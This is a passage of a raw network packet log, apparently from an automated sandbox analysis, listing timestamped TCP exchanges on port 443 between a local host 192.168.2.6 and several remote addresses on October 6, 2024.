                                                                                                                            Oct 6, 2024 13:50:13.105763912 CEST44349797172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.105815887 CEST49797443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.105829954 CEST44349797172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.106236935 CEST44349795172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.106281996 CEST49795443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.106292009 CEST44349795172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.111087084 CEST44349794172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.111152887 CEST49794443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.111167908 CEST44349794172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.111538887 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.111591101 CEST49796443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.111598969 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.112124920 CEST44349797172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.112154007 CEST44349797172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.112181902 CEST49797443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.112199068 CEST44349797172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.112258911 CEST49797443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.112462997 CEST44349795172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.112523079 CEST49795443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.112533092 CEST44349795172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.117698908 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.117803097 CEST49796443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.117814064 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.118861914 CEST44349795172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.118916035 CEST49795443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.118926048 CEST44349795172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.123975039 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.124047041 CEST49796443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.124056101 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.125127077 CEST44349795172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.125193119 CEST49795443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.125205994 CEST44349795172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.130125999 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.130192041 CEST49796443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.130201101 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.131304979 CEST44349795172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.131408930 CEST49795443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.131422043 CEST44349795172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.135404110 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.135452032 CEST49796443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.135459900 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.137903929 CEST44349795172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.138020992 CEST49795443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.138035059 CEST44349795172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.140897989 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.140963078 CEST49796443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.140970945 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.142047882 CEST44349795172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.142098904 CEST49795443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.142107010 CEST44349795172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.146087885 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.146141052 CEST49796443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.146148920 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.147872925 CEST44349795172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.147928953 CEST49795443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.147938967 CEST44349795172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.148128986 CEST44349795172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.148180962 CEST49795443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.151866913 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.151916981 CEST49796443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.151923895 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.154687881 CEST49804443192.168.2.6104.17.247.203
                                                                                                                            Oct 6, 2024 13:50:13.154721975 CEST44349804104.17.247.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.156900883 CEST49803443192.168.2.640.113.110.67
                                                                                                                            Oct 6, 2024 13:50:13.156996012 CEST49803443192.168.2.640.113.110.67
                                                                                                                            Oct 6, 2024 13:50:13.157004118 CEST4434980340.113.110.67192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.157037020 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.157083035 CEST49796443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.157089949 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.157121897 CEST44349794172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.157165051 CEST49803443192.168.2.640.113.110.67
                                                                                                                            Oct 6, 2024 13:50:13.157305002 CEST49794443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.157324076 CEST44349794172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.159471035 CEST44349794172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.159543037 CEST49794443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.159558058 CEST44349794172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.161494017 CEST44349797172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.161569118 CEST44349797172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.161777020 CEST49797443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.161845922 CEST44349797172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.162374020 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.162466049 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.162499905 CEST49796443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.162512064 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.162560940 CEST49796443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.163914919 CEST44349797172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.163966894 CEST49797443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.163985968 CEST44349797172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.165661097 CEST44349794172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.165841103 CEST49794443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.165859938 CEST44349794172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.167721033 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.170207977 CEST44349797172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.170275927 CEST49797443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.170290947 CEST44349797172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.171632051 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.171680927 CEST49796443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.171693087 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.171817064 CEST44349794172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.171885014 CEST49794443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.171900034 CEST44349794172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.175765991 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.175839901 CEST49796443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.175848007 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.176702976 CEST44349797172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.176763058 CEST49797443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.176779985 CEST44349797172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.178035021 CEST44349794172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.178134918 CEST49794443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.178152084 CEST44349794172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.179184914 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.179272890 CEST49796443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.179280996 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.182710886 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.182770014 CEST44349797172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.182802916 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.182888031 CEST49796443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.182895899 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.182941914 CEST49797443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.182955980 CEST44349797172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.183099985 CEST49796443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.184571981 CEST44349794172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.184629917 CEST49794443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.184643984 CEST44349794172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.186269999 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.189099073 CEST44349797172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.189152002 CEST49797443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.189165115 CEST44349797172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.189733982 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.189781904 CEST49796443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.189795971 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.190543890 CEST44349794172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.190607071 CEST49794443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.190620899 CEST44349794172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.193195105 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.193239927 CEST49796443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.193248034 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.195271015 CEST44349797172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.195321083 CEST49797443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.195336103 CEST44349797172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.196713924 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.196764946 CEST49796443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.196773052 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.197021961 CEST44349794172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.197092056 CEST49794443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.197105885 CEST44349794172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.200222015 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.200273037 CEST49796443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.200280905 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.201718092 CEST44349797172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.201776981 CEST49797443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.201793909 CEST44349797172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.203218937 CEST44349794172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.203277111 CEST49794443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.203290939 CEST44349794172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.203397036 CEST4434980340.113.110.67192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.203577042 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.203624964 CEST49796443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.203634977 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.205241919 CEST49795443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.205261946 CEST44349795172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.207137108 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.207189083 CEST49796443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.207199097 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.207815886 CEST44349797172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.207864046 CEST49797443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.207879066 CEST44349797172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.209393024 CEST44349794172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.209450960 CEST49794443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.209465027 CEST44349794172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.210479021 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.210544109 CEST49796443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.210551023 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.214134932 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.214174986 CEST49796443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.214184046 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.214194059 CEST44349797172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.214251995 CEST49797443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.214266062 CEST44349797172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.214914083 CEST44349794172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.214972019 CEST49794443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.215006113 CEST44349794172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.217581987 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.217637062 CEST49796443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.217645884 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.219721079 CEST44349797172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.219774961 CEST49797443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.219789028 CEST44349797172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.220160961 CEST44349794172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.220211983 CEST49794443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.220226049 CEST44349794172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.220937967 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.220988035 CEST49796443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.220997095 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.224469900 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.224528074 CEST49796443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.224535942 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.225394964 CEST44349797172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.225446939 CEST49797443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.225462914 CEST44349797172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.225568056 CEST44349794172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.225617886 CEST49794443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.225631952 CEST44349794172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.227940083 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.228008032 CEST49796443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.228018045 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.230911016 CEST44349797172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.230997086 CEST49797443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.231009960 CEST44349797172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.231067896 CEST44349794172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.231137991 CEST49794443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.231151104 CEST44349794172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.231329918 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.231389046 CEST49796443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.231395960 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.235738039 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.235786915 CEST49796443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.235795975 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.236557961 CEST44349794172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.236608982 CEST49794443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.236623049 CEST44349794172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.236741066 CEST44349797172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.236788034 CEST49797443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.236803055 CEST44349797172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.238176107 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.238224983 CEST49796443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.238233089 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.241575956 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.241628885 CEST49796443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.241640091 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.241928101 CEST44349794172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.241971016 CEST44349794172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.241982937 CEST49794443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.242001057 CEST44349794172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.242053032 CEST49794443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.244700909 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.244757891 CEST49796443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.244765997 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.247071981 CEST44349797172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.247126102 CEST49797443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.247139931 CEST44349797172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.247328043 CEST44349794172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.247673035 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.247719049 CEST49796443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.247730017 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.249007940 CEST44349797172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.249044895 CEST44349797172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.249067068 CEST49797443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.249083042 CEST44349797172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.249147892 CEST49797443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.250868082 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.250911951 CEST49796443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.250919104 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.251363993 CEST44349794172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.251422882 CEST49794443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.251436949 CEST44349794172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.253211975 CEST44349797172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.254571915 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.254622936 CEST49796443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.254632950 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.255748034 CEST44349794172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.255805969 CEST49794443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.255820036 CEST44349794172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.257055044 CEST44349797172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.257066011 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.257091999 CEST44349797172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.257102966 CEST49797443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.257119894 CEST44349797172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.257126093 CEST49796443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.257136106 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.257149935 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.257179976 CEST49797443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.257205009 CEST49796443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.259104013 CEST44349794172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.259166956 CEST49794443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.259186983 CEST44349794172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.259890079 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.260715961 CEST44349797172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.262043953 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.262140989 CEST49796443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.262140989 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.262171030 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.262273073 CEST49796443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.262552023 CEST44349794172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.262609959 CEST49794443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.262624025 CEST44349794172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.264142990 CEST44349797172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.264170885 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.264188051 CEST44349797172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.264204025 CEST49797443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.264225960 CEST44349797172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.264286995 CEST49797443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.265908957 CEST44349794172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.265964031 CEST49794443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.265994072 CEST44349794172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.266127110 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.266180038 CEST49796443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.266190052 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.267600060 CEST44349797172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.267998934 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.268049955 CEST49796443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.268059015 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.269467115 CEST44349794172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.269527912 CEST49794443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.269541979 CEST44349794172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.270035028 CEST44349796172.217.18.1192.168.2.6
